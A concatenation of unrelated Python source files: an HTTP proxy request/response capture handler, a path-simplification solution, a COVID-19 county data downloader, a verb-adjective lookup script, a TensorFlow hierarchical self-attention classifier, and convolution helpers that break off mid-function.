    def capture_request(self, request):
        """Capture a request and save the unique id associated with the
        captured request in the id field.
        If any modification rules are set, the request will be modified
        before capture.
        Args:
            request: The request to capture.
        Returns: The captured request id.
        """
        # Skip ignored HTTP methods (OPTIONS by default) and anything
        # outside the configured capture scopes.
        ignored_methods = self.server.options.get(
            'ignore_http_methods', ['OPTIONS'])
        if request.method in ignored_methods or not self.in_scope(self.server.scopes, request.url):
            log.debug('Not capturing %s request: %s', request.method, request.url)
            return
        log.info('Capturing request: %s', request.url)
        # Save the request to our storage
        self.server.storage.save_request(request)
    def capture_response(self, request_id, url, response):
        """Capture a response and its body that relate to a previous request.
        Args:
            request_id: The id of the original request.
            url: The request url.
            response: The response to capture.
        """
        log.info('Capturing response: %s %s %s', url, response.status_code, response.reason)
        self.server.storage.save_response(request_id, response)
    def in_scope(self, scopes, url):
        """Return True when *url* matches one of the configured scope
        regexes, or when no scopes are configured at all."""
        if not scopes:
            return True
        if not is_list_alike(scopes):
            scopes = [scopes]
        return any(re.search(scope, url) for scope in scopes)
class CaptureRequestHandler(CaptureMixin, ProxyRequestHandler):
"""Specialisation of ProxyRequestHandler that captures requests and responses
that pass through the proxy server.
"""
def __init__(self, *args, **kwargs):
try:
super().__init__(*args, **kwargs)
except (ConnectionError, socket.timeout, FileNotFoundError) as e:
# Suppress connectivity related tracebacks to prevent these normally
# harmless exceptions from alarming users. These exceptions can often
# occur during server shutdown.
if self.server.options.get('suppress_connection_errors', True):
log.debug(str(e))
else:
raise e
def handle_request(self, req, req_body):
"""Captures a request and its body.
Args:
req: The request (an instance of CaptureRequestHandler).
req_body: The binary request body.
"""
# First make any modifications to the request
# DEPRECATED. This will be replaced by request_interceptor
req.body = req_body # Temporarily attach the body to the request for modification
self.server.modifier.modify_request(req, urlattr='path', methodattr='command')
req_body = req.body
# Convert the implementation specific request to one of our requests
# for handling.
request = self._create_request(req, req_body)
# Call the request interceptor if set
if self.server.request_interceptor is not None:
self.server.request_interceptor(request)
if request.response:
# The interceptor has created a response for us to send back immediately
self.commit_response(
request.response.status_code,
request.response.reason,
request.response.headers,
request.response.body
)
return False # Signals that we've committed the response ourselves
# Transfer any modifications to the original request
req.command = request.method
req.path = request.url
req.headers = HTTPMessage()
for name, val in request.headers.items():
req.headers.add_header(name, val)
if request.body:
req_body = request.body
self.capture_request(request)
if request.id is not None: # Will not be None when captured
req.id = request.id
return req_body
def handle_response(self, req, req_body, res, res_body):
"""Captures a response and its body that relate to a previous request.
Args:
req: The original request (an instance of CaptureRequestHandler).
req_body: The body of the original request.
res: The response (a http.client.HTTPResponse instance) that corresponds to the request.
res_body: The binary response body.
"""
# Make any modifications to the response
# DEPRECATED. This will be replaced by response_interceptor.
self.server.modifier.modify_response(res, req, urlattr='path')
if not hasattr(req, 'id'):
# Request was not captured
return
# Convert the implementation specific response to one of our responses
# for handling.
response = Response(
status_code=res.status,
reason=res.reason,
headers=res.headers.items(),
body=res_body
)
# Call the response interceptor if set
if self.server.response_interceptor is not None:
self.server.response_interceptor(self._create_request(req, req_body, response), response)
# Transfer any modifications to the original response
res.status = response.status_code
res.reason = response.reason
res.headers = HTTPMessage()
for name, val in response.headers.items():
res.headers.add_header(name, val)
if response.body:
res_body = response.body
self.capture_response(req.id, req.path, response)
return res_body
def _create_request(self, req, req_body, response=None):
request = Request(
method=req.command,
url=req.path,
headers=req.headers.items(),
body=req_body
)
request.response = response
return request
@property
def certdir(self):
"""Overrides the certdir attribute to retrieve the storage-specific certificate directory."""
return self.server.storage.get_cert_dir()
def log_request(self, code='-', size='-'):
# Send server log messages through our own logging config.
try:
log.debug('%s %s', self.path, code)
except AttributeError:
pass
def log_message(self, format_, *args):
# Send messages through our own logging config.
log.debug(format_, *args)
    def log_error(self, format_, *args):
        """Route server error messages through our own logging config."""
        # Suppress "Request timed out: timeout('timed out',)"
        if args and isinstance(args[0], socket.timeout):
            return
        # Send server error messages through our own logging config.
        log.error(format_, *args, exc_info=True)
def create_custom_capture_request_handler(custom_response_handler):
    """Creates a custom class derived from CaptureRequestHandler with the
    handle_response method overwritten to return
    custom_response_handler after running super().handle_response

    DEPRECATED. Use response_interceptor.

    Args:
        custom_response_handler: callable invoked with the same arguments as
            handle_response; its return value becomes the handler's result.

    Returns:
        The derived CustomCaptureRequestHandler class (not an instance).
    """
    class CustomCaptureRequestHandler(CaptureRequestHandler):
        def handle_response(self, *args, **kwargs):
            # Run the standard capture logic first, then hand the same
            # arguments to the user-supplied handler.
            super().handle_response(*args, **kwargs)
            return custom_response_handler(*args, **kwargs)
    return CustomCaptureRequestHandler
|
'''
Given an absolute path for a file (Unix-style), simplify it. Or in other words, convert it to the canonical path.
In a UNIX-style file system, a period . refers to the current directory. Furthermore, a double period .. moves the directory up a level.
Note that the returned canonical path must always begin with a slash /, and there must be only a single slash / between two directory names. The last directory name (if it exists) must not end with a trailing /. Also, the canonical path must be the shortest string representing the absolute path.
Example 1:
Input: "/home/"
Output: "/home"
Explanation: Note that there is no trailing slash after the last directory name.
Example 2:
Input: "/../"
Output: "/"
Explanation: Going one level up from the root directory is a no-op, as the root level is the highest level you can go.
Example 3:
Input: "/home//foo/"
Output: "/home/foo"
Explanation: In the canonical path, multiple consecutive slashes are replaced by a single one.
Example 4:
Input: "/a/./b/../../c/"
Output: "/c"
Example 5:
Input: "/a/../../b/../c//.//"
Output: "/c"
Example 6:
Input: "/a//b////c/d//././/.."
Output: "/a/b/c"
'''
class Solution:
    def simplifyPath(self, path: str) -> str:
        """Return the canonical form of an absolute Unix-style path.

        Empty components (from repeated slashes) and '.' are skipped;
        '..' pops the last directory when one exists (a no-op at root).

        Args:
            path: an absolute Unix-style path string.

        Returns:
            The shortest equivalent absolute path, beginning with '/'.
        """
        stack = []
        for part in path.split('/'):
            if part == '..':
                # O(1) pop instead of rebuilding the list with a slice;
                # guard keeps '..' at root a no-op.
                if stack:
                    stack.pop()
            elif part and part != '.':
                stack.append(part)
        return '/' + '/'.join(stack)
|
import datetime
from io import StringIO
import concurrent.futures
import os
import sys
import pandas as pd
import requests
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from top_counties import most_infected
def days_between(start_date: datetime.date, end_date: datetime.date) -> list:
    """Return every date from start_date through end_date, inclusive.

    Args:
        start_date (datetime.date): start date
        end_date (datetime.date): end date

    Returns:
        list: list of datetime.date objects, one per day in the range
    """
    span = (end_date - start_date).days
    one_day = datetime.timedelta(days=1)
    days = []
    current = start_date
    for _ in range(span + 1):
        days.append(current)
        current += one_day
    return days
def us_data(start_date: datetime.date, end_date: datetime.date) -> list:
    """Download and return United States COVID-19 data, one frame per day.

    Args:
        start_date (datetime.date): start date
        end_date (datetime.date): end date

    Returns:
        list: list of pandas DataFrames, each filtered to US rows
    """
    base_url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/'
    frames = []
    for day in days_between(start_date, end_date):
        # Daily report files are named MM-DD-YYYY.csv in the repository.
        url = base_url + day.strftime('%m-%d-%Y') + '.csv'
        frame = pd.read_csv(StringIO(requests.get(url).text))
        # The country column was renamed across report versions.
        try:
            frames.append(frame[frame['Country_Region'] == 'US'])
        except KeyError:
            frames.append(frame[frame['Country/Region'] == 'US'])
    return frames
# def new_cases(day: datetime.date, location: str) -> int:
# """returns the number of new cases on any day and in any city in the United States
# Args:
# day (datetime.date): day to get new cases
# location (str): county to get new cases
# Returns:
# int: new cases
# """
# yesterday = day - datetime.timedelta(days=1)
# old, new = us_data(yesterday, day)
# try:
# old = old.loc[old['Admin2'] == location, 'Confirmed'].iloc[0]
# except KeyError:
# old = 0
# try:
# new = new.loc[new['Admin2'] == location, 'Confirmed'].iloc[0]
# except KeyError:
# return 0
# return new - old
# def daily_new_cases(start_date: datetime.date, end_date: datetime.date, location: str) -> list:
# """returns the daily new cases data for a specific county
# Args:
# start_date (datetime.date): start date
# end_date (datetime.date): end date
# location (str): county
# Returns:
# list: list of integers containing daily new cases data
# """
# cases = [new_cases(day, location)
# for day in days_between(start_date, end_date)]
# return cases
def confirmed_cases(day: datetime.date, county: str, state: str) -> int:
    """Return the cumulative confirmed case count for a county on a given day.

    Args:
        day (datetime.date): day to look up
        county (str): county name (matched against the 'Admin2' column)
        state (str): state name (matched against 'Province_State')

    Returns:
        int: cumulative confirmed cases for the county on that day

    NOTE(review): unlike us_data(), there is no fallback for the older
    'Country/Region' column naming -- presumably only reports using the
    newer schema are requested; confirm for early-2020 dates.
    """
    day = day.strftime('%m-%d-%Y')
    url = f'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/{day}.csv'
    df = pd.read_csv(StringIO(requests.get(url).text))
    df = df.loc[df['Country_Region'] == 'US']
    df = df.loc[df['Province_State'] == state]
    df = df[['Admin2', 'Confirmed']]
    return int(df.loc[df['Admin2'] == county]['Confirmed'].iloc[0])
def daily_confirmed_cases_complete(start_date, end_date, county, state):
    """Collect daily cumulative confirmed cases for a county and export a CSV.

    The output file is named '<State>_<County>.csv' (spaces replaced by
    hyphens) under the COVID-19 data directory.
    """
    records = [(day, confirmed_cases(day, county, state))
               for day in days_between(start_date, end_date)]
    table = pd.DataFrame(records)
    table.columns = ['Date', 'Confirmed']
    table.set_index('Date', inplace=True)
    out_path = (r'Data Collection\Data\COVID-19\\'
                + state.replace(' ', '-') + '_'
                + county.replace(' ', '-') + '.csv')
    with open(out_path, 'w', newline='') as f:
        print(county + ', ' + state + ' export complete')
        f.write(table.to_csv())
if __name__ == "__main__":
    start_date = datetime.date(2020, 3, 31)
    end_date = datetime.date(2020, 5, 31)
    # Parse '<County>, <State>' pairs from the counties file, keeping only
    # letters, commas and spaces before splitting on ', '.
    with open(r'Data Collection\Apparatus\Docs\counties.csv') as f:
        locations = list(map(tuple, [(''.join([i for i in j if i.isalpha() or i == ',' or i == ' ']).split(', ')) for j in f.readlines()]))
    # Export every county concurrently (in reversed file order).
    with concurrent.futures.ThreadPoolExecutor() as executor:
        _ = [executor.submit(daily_confirmed_cases_complete, start_date, end_date, county, state) for county, state in locations[::-1]]
    exit(0)
    # NOTE(review): everything below is unreachable because of exit(0)
    # above -- presumably kept for manual one-off runs; confirm or remove.
    daily_confirmed_cases_complete(start_date, end_date, 'New York City', 'New York')
    for county, state in most_infected(5, start_date, False):
        cases = {}
        for day in days_between(start_date, end_date):
            cases[day] = confirmed_cases(day, county, state)
        cases = pd.DataFrame([[key, value] for key, value in cases.items()])
        cases.columns = ['Date', 'Confirmed']
        cases.set_index('Date', inplace=True)
        with open(r'Data Collection\Data\COVID-19\\' + county + '.csv', 'w', newline='') as f:
            f.write(cases.to_csv())
|
import json
import operator
def filter_dict(input_dict):
    """For each verb, keep only the five lowest-count (adjective, count) pairs.

    Args:
        input_dict: mapping of verb -> {adjective: count}

    Returns:
        dict: mapping of verb -> list of at most five (adjective, count)
        tuples sorted by ascending count
    """
    return {
        verb: sorted(counts.items(), key=operator.itemgetter(1))[:5]
        for verb, counts in input_dict.items()
    }
# Load the verb -> {adjective: count} mappings produced upstream.
with open('verb_nsubj_amod_dict.json', 'r') as nsubj_f:
    verb_nsubj_amod_dict = json.load(nsubj_f)
with open('verb_dobj_amod_dict.json', 'r') as dobj_f:
    verb_dobj_amod_dict = json.load(dobj_f)
# filtered_nsubj_dict = filter_dict(verb_nsubj_amod_dict)
# filtered_dobj_dict = filter_dict(verb_dobj_amod_dict)
# Filtering is currently disabled; the full dictionaries are used as-is.
filtered_nsubj_dict = verb_nsubj_amod_dict
filtered_dobj_dict = verb_dobj_amod_dict
# Interactive lookup loop: print the recorded adjectives for each verb the
# user enters, until the user types QUIT.
while True:
    command = input('Please give me your interested word(QUIT means quit this program):')
    if command == 'QUIT':
        break
    else:
        if command in filtered_nsubj_dict:
            print('Top 5 nsubj adj:', filtered_nsubj_dict[command])
        else:
            print('There is no nsubj adj record for verb:', command)
        if command in filtered_dobj_dict:
            print('Top 5 dobj adj:', filtered_dobj_dict[command])
        else:
            print('There is no dobj adj record for verb:', command)
print('end')
|
import numpy as np
import tensorflow as tf
import sys
import time
from sklearn.metrics import f1_score
import random
class hisan(object):
    '''
    hierarchical self-attention network
    parameters:
      - embedding_matrix: numpy array
        numpy array of word embeddings
        each row should represent a word embedding
        NOTE: the word index 0 is dropped, so the first row is ignored
      - num_classes: int
        number of output classes
      - max_sents: int
        maximum number of sentences/lines per document
      - max_words: int
        maximum number of words per sentence/line
      - attention_heads: int (default: 8)
        number of attention heads to use in multihead attention
      - attention_size: int (default: 512)
        dimension size of output embeddings from attention
      - dropout_keep: float (default: 0.9)
        dropout keep rate for embeddings and attention softmax
      - activation: tensorflow activation function (default: tf.nn.elu)
        activation function to use for feature extraction
      - lr: float (default: 0.0001)
        learning rate for adam optimizer
    methods:
      - train(data,labels,batch_size=64,epochs=30,patience=5,
              validation_data,savebest=False,filepath=None)
        train network on given data
      - predict(data)
        return the predicted labels for given data
      - score(data,labels)
        return the micro and macro f-scores of predicted labels on given data
      - save(filepath)
        save the model weights to a file
      - load(filepath)
        load model weights from a file

    NOTE(review): this class uses TensorFlow 1.x graph-mode APIs
    (tf.placeholder, tf.Session, tf.contrib); it will not run under TF 2.x
    without tf.compat.v1 -- confirm the pinned TF version.
    '''
    def __init__(self,embedding_matrix,num_classes,max_sents,max_words,attention_heads=8,
                 attention_size=512,dropout_keep=0.9,activation=tf.nn.elu,lr=0.0001):
        # Store hyperparameters; dropout keep-probability is fed at run time
        # so inference can use 1.0.
        self.dropout_keep = dropout_keep
        self.dropout = tf.placeholder(tf.float32)
        self.ms = max_sents
        self.mw = max_words
        self.embedding_matrix = embedding_matrix.astype(np.float32)
        self.attention_size = attention_size
        self.attention_heads = attention_heads
        self.activation = activation
        #doc input
        self.doc_input = tf.placeholder(tf.int32, shape=[None,max_sents,max_words])
        # one embedding per document, computed independently via map_fn
        self.doc_embeds = tf.map_fn(self._attention_step,self.doc_input,dtype=tf.float32)
        #classification functions
        output = tf.layers.dense(self.doc_embeds,num_classes,
                 kernel_initializer=tf.contrib.layers.xavier_initializer())
        self.prediction = tf.nn.softmax(output)
        #loss, accuracy, and training functions
        self.labels = tf.placeholder(tf.int32,shape=[None])
        self.loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
                    logits=output,labels=self.labels))
        self.optimizer = tf.train.AdamOptimizer(lr,0.9,0.99).minimize(self.loss)
        #init op
        self.saver = tf.train.Saver()
        self.sess = tf.Session()
        self.sess.run(tf.global_variables_initializer())
    def _attention_step(self,doc):
        """Embed a single document (sents x words of word ids) into a vector.

        Word index 0 is treated as padding: lines and trailing words that are
        all zero are trimmed before attention is applied.
        """
        words_per_line = tf.math.count_nonzero(doc,1)
        num_lines = tf.math.count_nonzero(words_per_line)
        max_words_ = tf.reduce_max(words_per_line)
        # trim padding lines/words to the document's actual extent
        doc_input_reduced = doc[:num_lines,:max_words_]
        num_words = words_per_line[:num_lines]
        #word embeddings
        word_embeds = tf.gather(tf.get_variable('embeddings',
                      initializer=self.embedding_matrix,dtype=tf.float32),
                      doc_input_reduced)
        word_embeds = tf.nn.dropout(word_embeds,self.dropout)
        #masking
        mask_base = tf.cast(tf.sequence_mask(num_words,max_words_),tf.float32)
        mask = tf.tile(tf.expand_dims(mask_base,2),[1,1,self.attention_size])
        mask2 = tf.tile(tf.expand_dims(mask_base,2),[self.attention_heads,1,max_words_])
        #word self attention
        Q = tf.layers.conv1d(word_embeds,self.attention_size,1,
            padding='same',activation=self.activation,
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        K = tf.layers.conv1d(word_embeds,self.attention_size,1,
            padding='same',activation=self.activation,
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        V = tf.layers.conv1d(word_embeds,self.attention_size,1,
            padding='same',activation=self.activation,
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        Q = tf.multiply(Q,mask)
        K = tf.multiply(K,mask)
        V = tf.multiply(V,mask)
        # split attention_size into heads along the batch axis
        Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
        K_ = tf.concat(tf.split(K,self.attention_heads,axis=2),axis=0)
        V_ = tf.concat(tf.split(V,self.attention_heads,axis=2),axis=0)
        outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
        outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
        # masked (zero) positions are pushed to a large negative logit so
        # softmax effectively ignores them
        outputs = tf.where(tf.equal(outputs,0),tf.ones_like(outputs)*-1000,outputs)
        outputs = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
        word_self = tf.multiply(outputs,mask2)
        outputs = tf.matmul(word_self,V_)
        outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
        outputs = tf.multiply(outputs,mask)
        #word target attention
        Q = tf.get_variable('word_Q',(1,1,self.attention_size),
            tf.float32,tf.orthogonal_initializer())
        Q = tf.tile(Q,[num_lines,1,1])
        Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
        K_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
        V_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
        outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
        outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
        outputs = tf.where(tf.equal(outputs,0),tf.ones_like(outputs)*-1000,outputs)
        word_target = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
        outputs = tf.matmul(word_target,V_)
        outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
        sent_embeds = tf.transpose(outputs,[1,0,2])
        sent_embeds = tf.nn.dropout(sent_embeds,self.dropout)
        #sent self attention
        Q = tf.layers.conv1d(sent_embeds,self.attention_size,1,
            padding='same',activation=self.activation,
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        K = tf.layers.conv1d(sent_embeds,self.attention_size,1,
            padding='same',activation=self.activation,
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        V = tf.layers.conv1d(sent_embeds,self.attention_size,1,
            padding='same',activation=self.activation,
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
        K_ = tf.concat(tf.split(K,self.attention_heads,axis=2),axis=0)
        V_ = tf.concat(tf.split(V,self.attention_heads,axis=2),axis=0)
        outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
        outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
        sent_self = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
        outputs = tf.matmul(sent_self,V_)
        outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
        #sent target attention
        Q = tf.get_variable('sent_Q',(1,1,self.attention_size),
            tf.float32,tf.orthogonal_initializer())
        Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
        K_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
        V_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
        outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
        outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
        sent_target = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
        outputs = tf.matmul(sent_target,V_)
        outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
        # collapse the two singleton axes left by target attention
        doc_embed = tf.nn.dropout(tf.squeeze(outputs,[0]),self.dropout)
        doc_embed = tf.squeeze(doc_embed,[0])
        return doc_embed
    def train(self,data,labels,batch_size=64,epochs=30,patience=5,
              validation_data=None,savebest=False,filepath=None):
        '''
        train network on given data
        parameters:
          - data: numpy array
            3d numpy array (doc x sentence x word ids) of input data
          - labels: numpy array
            1d numpy array of labels for given data
          - batch size: int (default: 64)
            batch size to use for training
          - epochs: int (default: 30)
            number of epochs to train for
          - patience: int (default: 5)
            training stops after no improvement in validation score
            for this number of epochs
          - validation_data: tuple (optional)
            tuple of numpy arrays (X,y) representing validation data
          - savebest: boolean (default: False)
            set to True to save the best model based on validation score per epoch
          - filepath: string (optional)
            path to save model if savebest is set to True
        outputs:
            None
        '''
        if savebest==True and filepath==None:
            raise Exception("Please enter a path to save the network")
        if validation_data:
            validation_size = len(validation_data[0])
        else:
            validation_size = len(data)
        # NOTE(review): when validation_data is None, the self.score() call
        # later in this loop still indexes validation_data[0] and will raise
        # TypeError -- confirm whether training without validation data is
        # actually supported.
        print('training network on %i documents, validation on %i documents' \
              % (len(data), validation_size))
        #track best model for saving
        prevbest = 0
        pat_count = 0
        for ep in range(epochs):
            #shuffle data
            xy = list(zip(data,labels))
            random.shuffle(xy)
            data,labels = zip(*xy)
            data = list(data)
            labels = list(labels)
            y_pred = []
            y_true = []  # NOTE(review): never used below
            start_time = time.time()
            #train
            for start in range(0,len(data),batch_size):
                #get batch index
                if start+batch_size < len(data):
                    stop = start+batch_size
                else:
                    stop = len(data)
                feed_dict = {self.doc_input:data[start:stop],
                             self.labels:labels[start:stop],
                             self.dropout:self.dropout_keep}
                pred,cost,_ = self.sess.run([self.prediction,self.loss,self.optimizer],
                              feed_dict=feed_dict)
                #track correct predictions
                y_pred.append(np.argmax(pred,1))
                sys.stdout.write("epoch %i, sample %i of %i, loss: %f \r"\
                                 % (ep+1,stop,len(data),cost))
                sys.stdout.flush()
            #checkpoint after every epoch
            print("\ntraining time: %.2f" % (time.time()-start_time))
            y_pred = np.concatenate(y_pred,0)
            micro = f1_score(labels,y_pred,average='micro')
            macro = f1_score(labels,y_pred,average='macro')
            print("epoch %i training micro/macro: %.4f, %.4f" % (ep+1,micro,macro))
            micro,macro = self.score(validation_data[0],validation_data[1],
                          batch_size=batch_size)
            print("epoch %i validation micro/macro: %.4f, %.4f" % (ep+1,micro,macro))
            #save if performance better than previous best
            if micro >= prevbest:
                prevbest = micro
                pat_count = 0
                if savebest:
                    self.save(filepath)
            else:
                pat_count += 1
                if pat_count >= patience:
                    break
            #reset timer
            start_time = time.time()
    def predict(self,data,batch_size=64):
        '''
        return the predicted labels for given data
        parameters:
          - data: numpy array
            3d numpy array (doc x sentence x word ids) of input data
          - batch size: int (default: 64)
            batch size to use during inference
        outputs:
            1d numpy array of predicted labels for input data
        '''
        y_pred = []
        for start in range(0,len(data),batch_size):
            #get batch index
            if start+batch_size < len(data):
                stop = start+batch_size
            else:
                stop = len(data)
            # dropout keep-probability 1.0 disables dropout at inference
            feed_dict = {self.doc_input:data[start:stop],self.dropout:1.0}
            prob = self.sess.run(self.prediction,feed_dict=feed_dict)
            y_pred.append(np.argmax(prob,1))
            sys.stdout.write("processed %i of %i records \r" \
                             % (stop,len(data)))
            sys.stdout.flush()
        print()
        y_pred = np.concatenate(y_pred,0)
        return y_pred
    def score(self,data,labels,batch_size=64):
        '''
        return the micro and macro f-score of predicted labels on given data
        parameters:
          - data: numpy array
            3d numpy array (doc x sentence x word ids) of input data
          - labels: numpy array
            1d numpy array of labels for given data
          - batch size: int (default: 64)
            batch size to use during inference
        outputs:
            tuple of floats (micro,macro) representing micro and macro f-score
            of predicted labels on given data
        '''
        y_pred = self.predict(data,batch_size)
        micro = f1_score(labels,y_pred,average='micro')
        macro = f1_score(labels,y_pred,average='macro')
        return micro,macro
    def save(self,filename):
        '''
        save the model weights to a file
        parameters:
          - filepath: string
            path to save model weights
        outputs:
            None
        '''
        self.saver.save(self.sess,filename)
    def load(self,filename):
        '''
        load model weights from a file
        parameters:
          - filepath: string
            path from which to load model weights
        outputs:
            None
        '''
        self.saver.restore(self.sess,filename)
if __name__ == "__main__":
    '''
    dummy test data
    '''
    #params
    batch_size = 64
    lr = 0.0001
    epochs = 5
    train_samples = 10000
    test_samples = 10000
    vocab_size = 750
    max_lines = 50
    max_words = 10
    num_classes = 10
    embedding_size = 100
    attention_heads = 4
    attention_size = 64
    #create data
    # random embedding matrix and random word-id documents (ids start at 1
    # because 0 is treated as padding by the model)
    vocab = np.random.rand(vocab_size,embedding_size)
    X = np.random.randint(1,vocab_size,
        (train_samples+test_samples,max_lines,max_words))
    #test train split
    X_train = X[:train_samples]
    X_test = X[train_samples:]
    y_train = np.random.randint(0,num_classes,train_samples)
    y_test = np.random.randint(0,num_classes,test_samples)
    #train model
    model = hisan(vocab,num_classes,max_lines,max_words,
            attention_heads,attention_size,lr=lr)
    model.train(X_train,y_train,batch_size,epochs,
                validation_data=(X_test,y_test))
import numpy as np
import tensorflow as tf
import torch
from torch.nn import functional as F
def createCircularMask(h, w, center=None, radius=None):
    """Create an h-by-w float array holding a filled circle of ones.

    Args:
        h: image height in pixels
        w: image width in pixels
        center: (x, y) circle center; defaults to the image middle
        radius: circle radius; defaults to the largest radius that keeps
            the circle inside the image

    Returns:
        float array of shape (h, w): 1.0 inside the circle, 0.0 outside
    """
    if center is None:  # use the middle of the image
        center = [int(w / 2), int(h / 2)]
    if radius is None:  # use the smallest distance between the center and image walls
        radius = min(center[0], center[1], w - center[0], h - center[1])
    ys, xs = np.ogrid[:h, :w]
    dist_from_center = np.sqrt((xs - center[0]) ** 2 + (ys - center[1]) ** 2)
    inside = dist_from_center <= radius
    return inside * 1.0
def makeGaussian(size, sigma=3, center=None):
    """Make a square gaussian kernel.

    Args:
        size: length of a side of the square
        sigma: standard deviation of the gaussian
        center: (x0, y0) peak position; defaults to the middle of the square

    Returns:
        float array of shape (size, size) with peak value 1.0 at the center
    """
    xs = np.arange(0, size, 1, float)
    ys = xs[:, np.newaxis]
    if center is None:
        x0 = y0 = size // 2
    else:
        x0, y0 = center[0], center[1]
    sq_dist = (xs - x0) ** 2 + (ys - y0) ** 2
    return np.exp(-sq_dist / (2.0 * sigma ** 2))
def check_shape_image(image):
    """Coerce an image array toward 4D shape (batch, height, width, channels).

    A 2D array gains both a batch and a channel axis. A 3D array gains a
    batch axis when its trailing dims differ (trailing dim read as channels),
    or a channel axis when its leading dims differ (leading dim read as
    batch). Anything else is returned unchanged.
    """
    rank = len(image.shape)
    if rank == 2:
        return image[np.newaxis, ..., np.newaxis]
    if rank == 3:
        if image.shape[-1] != image.shape[-2]:
            # trailing dim differs -> treated as channels; add batch axis
            return image[np.newaxis, ...]
        if image.shape[0] != image.shape[1]:
            # leading dim differs -> treated as batch; add channel axis
            return image[..., np.newaxis]
    return image
def check_shape_kernel(kernel, x):
    """Coerce a kernel to 4D shape (kh, kw, in_channels, channel_multiplier).

    A 2D kernel is replicated across the channel axis of ``x``; a 3D kernel
    just gains a trailing multiplier axis; other kernels pass through.
    """
    rank = len(kernel.shape)
    if rank == 2:
        replicated = np.stack([kernel] * x.shape[-1], axis=-1)
        return replicated[..., np.newaxis]
    if rank == 3:
        return kernel[..., np.newaxis]
    return kernel
def cnn2d_depthwise_tf(image: np.ndarray,
                       filters: np.ndarray):
    """Depthwise 2D convolution via TensorFlow with SAME padding.

    A batch axis is added to ``image`` before the op and removed afterwards.

    NOTE(review): unlike the sibling tf wrappers this one carries no
    @tf.function decorator -- presumably relevant to the benchmark results
    in this file; confirm before changing.
    """
    features_tf = tf.nn.depthwise_conv2d(image[None], filters,
                                         strides=[1, 1, 1, 1], padding='SAME')
    return features_tf[0]
@tf.function
def cnn2d_tf(image: np.ndarray,
             filters: np.ndarray):
    """Standard 2D convolution via TensorFlow with SAME padding.

    A batch axis is added to ``image`` before the op and removed afterwards.
    """
    features_tf = tf.nn.conv2d(image[None], filters, strides=[1, 1, 1, 1],
                               padding='SAME')
    return features_tf[0]
@tf.function
def cnn2d_depthwise_tf_transpose(image: np.ndarray,
                                 filters: np.ndarray):
    """Depthwise 2D convolution using the NCHW data format.

    The image axes are reversed before the op and restored afterwards so the
    caller keeps the original layout.

    NOTE(review): NCHW depthwise_conv2d is typically GPU-only in TensorFlow
    -- confirm this path is exercised only on GPU hosts.
    """
    image = tf.transpose(image, perm=[2, 1, 0])[None]
    features_tf = tf.nn.depthwise_conv2d(image, filters,
                                         strides=[1, 1, 1, 1], padding='SAME',
                                         data_format="NCHW")
    return tf.transpose(features_tf[0], perm=[2, 1, 0])
def convert_to_torch(image, filters):
    """Convert a numpy image and filter bank to torch tensors.

    The image axes are fully reversed and a batch axis is prepended
    (H, W, C) -> (1, C, W, H); the filter axes are fully reversed
    (kh, kw, cin, cmul) -> (cmul, cin, kw, kh).
    """
    channels_first = image.transpose([2, 1, 0])
    image_torch = torch.tensor(channels_first[None])
    filters_torch = torch.tensor(filters.transpose([3, 2, 1, 0]))
    return image_torch, filters_torch
def cnn2d_depthwise_torch(image: np.ndarray,
                          filters: np.ndarray):
    """Depthwise 2D convolution via torch grouped convolution.

    Uses groups = input channels and padding of df // 2, returning a numpy
    array in the caller's original axis layout.
    """
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    image_torch, filters_torch = convert_to_torch(image, filters)
    image_torch = image_torch.to(device)
    filters_torch = filters_torch.to(device)
    df, _, cin, cmul = filters.shape
    # One single-channel filter per (input channel, multiplier) pair:
    # reshape to (cin * cmul, 1, df, df) as required by grouped conv2d.
    grouped = filters_torch.transpose(0, 1).contiguous()
    grouped = grouped.view(cin * cmul, 1, df, df)
    convolved = F.conv2d(image_torch, grouped, padding=df // 2, groups=cin)
    return convolved.cpu().numpy()[0].transpose([2, 1, 0])
def cnn2d_torch(image: np.ndarray,
                filters: np.ndarray):
    """Standard 2D convolution via torch with padding of df // 2.

    Returns a numpy array in the caller's original axis layout.
    """
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    image_torch, filters_torch = convert_to_torch(image, filters)
    image_torch = image_torch.to(device)
    filters_torch = filters_torch.to(device)
    df, _, cin, cmul = filters.shape
    convolved = F.conv2d(image_torch, filters_torch, padding=df // 2)
